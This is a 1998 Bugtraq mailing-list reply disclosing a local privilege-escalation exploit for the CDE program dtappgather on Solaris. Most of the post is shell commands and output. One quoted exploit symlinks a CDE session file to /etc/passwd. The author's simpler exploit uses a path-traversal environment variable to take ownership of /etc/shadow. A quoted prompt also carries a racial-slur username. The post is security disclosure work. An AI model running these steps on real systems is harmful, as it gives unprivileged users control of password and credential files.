Bugtraq mailing list archives

Re: /usr/dt/bin/dtappgather exploit

From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Tue, 24 Feb 1998 20:30:20 +0100

        I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:

nigg0r@host% ls -l /etc/passwd
-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather

    the exploit is much simpler than that.
        hey, it's even documented on the man page :-)

    Simply

    $ id
    uid=6969(foo) gid=666(bar)
    $ ls -l /etc/shadow
    -r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
    $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
    $ ls -l /etc/shadow
    -r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow

    Anyway, your exploit has an advantage: it works (at least,
    in solaris 2.5), even after patching CDE according to CERT
    advisory.
    Solaris 2.6 seems to have the right permisions:

            /var/dt -> rwxr-xr-x
            /var/dt/appconfig -> rwxr-xr-x
            /var/dt/tmp -> rwxrwxrwt

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me